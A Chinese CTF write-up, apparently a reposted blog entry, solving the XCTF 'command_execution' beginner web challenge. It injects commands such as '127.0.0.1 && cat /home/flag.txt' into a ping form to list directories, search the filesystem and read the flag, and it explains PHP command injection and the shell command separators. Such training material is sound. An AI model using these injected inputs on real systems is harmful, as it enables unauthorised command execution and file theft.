攻防世界-web-新手练习区(4)-command_execution

其他 2020-02-08 10:54:31 阅读次数: 0

题目

$[外链图片转存失败(img-POLxFvpf-1562054492256)(E:\CTF\小白学习总结\攻防世界\web\picture\11.ti.PNG)]$

$[外链图片转存失败(img-qeZZoVAb-1562054492258)(E:\CTF\小白学习总结\攻防世界\web\picture\11.1.PNG)]$

Writeup

因为是ping，所以尝试

ping 127.0.0.1

$[外链图片转存失败(img-0cu3mAx3-1562054492259)(E:\CTF\小白学习总结\攻防世界\web\picture\11.2.PNG)]$

可以正常执行

尝试命令拼接执行

127.0.0.1 && ls

$[外链图片转存失败(img-DqOyuKuC-1562054492260)(E:\CTF\小白学习总结\攻防世界\web\picture\11.3.PNG)]$

可以正常执行

尝试找到所有的.txt文件（这里是参考大佬思路）

127.0.0.1 && find / -name "*.txt"

$[外链图片转存失败(img-OR7slHWa-1562054492260)(E:\CTF\小白学习总结\攻防世界\web\picture\11.4.PNG)]$

发现flag.txt

于是打开flag.txt文件，得到flag

127.0.0.1 && cat /home/flag.txt

$[外链图片转存失败(img-pJazcvZL-1562054492262)(E:\CTF\小白学习总结\攻防世界\web\picture\11.flag.PNG)]$

知识点

命令执行漏洞

当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system，exec，shell_exec等，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。

在操作系统中，“&、|、||”都可以作为命令连接符使用，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令

A&&B，表示A命令语句执行成功，然后执行B命令语句
A&B，表示简单的拼接，A命令语句和B命令语句没有制约关系
A|B，表示A命令语句的输出，作为B命令语句的输入执行
A||B，表示A命令语句执行失败，然后才执行B命令语句
A;B，表示先执行A，再执行B

推荐文章：

https://www.freebuf.com/column/154670.html

https://www.cnblogs.com/xiaozi/p/7831529.htm

wyj_1216

发布了54 篇原创文章 · 获赞 25 · 访问量 1万+

私信关注

猜你喜欢

转载自blog.csdn.net/wyj_1216/article/details/94450113

攻防世界-web-新手练习区(4)-command_execution

攻防世界 WEB 新手练习区 command_execution 教程

攻防世界-web-新手练习区（3）

攻防世界-web-新手练习区（2）

攻防世界-web-新手练习区（1）

攻防世界 web command_execution

攻防世界-command_execution

攻防世界wp--web command_execution

攻防世界之command_execution（web简单）

攻防世界-web-新手练习区（5）-simple_php

攻防世界——WEB新手练习区

攻防世界 | command_execution WP

XCTF篇：Web (新手练习题)之 command_execution

攻防世界Web新手练习区（1-6）

攻防世界（Ctf-Web 新手练习区 Writeup）

xctf攻防世界web新手练习区--write up

攻防世界--web新手练习区（1）

攻防世界web新手练习区（2）

攻防世界(Xctf)web题新手练习区writeup

攻防世界web题新手练习区write up

攻防世界web新手练习区WP

攻防世界WEB新手练习区通关教程

攻防世界web新手练习区详细（小白入门）

攻防世界 WEB 新手练习区 backup 教程

攻防世界 web新手练习区题解上

xctf攻防世界-新手练习区(web) Writeup

CTF 刷题记录（二） command_execution（攻防世界）

攻防世界 reverse 新手练习区

攻防世界-web-高手进阶区-mfw

攻防世界web新手联系区

今日推荐

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

周排行

curl的POST请求，封装方法

8.1.1. Integer Types

Java基础 Day05(个人复习整理)

Python - Django - 中间件 process_exception

小L的试卷

【Shell编程】（函数）判断用户是否存在

python(css样式)

spring ant path 匹配原则 - 【笔记】

《JavaScript与JScript从入门到精通》(美)James.Jaworski.中译本.扫描版.pdf

Eclipse运行带参数的java程序

每日归档

更多

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)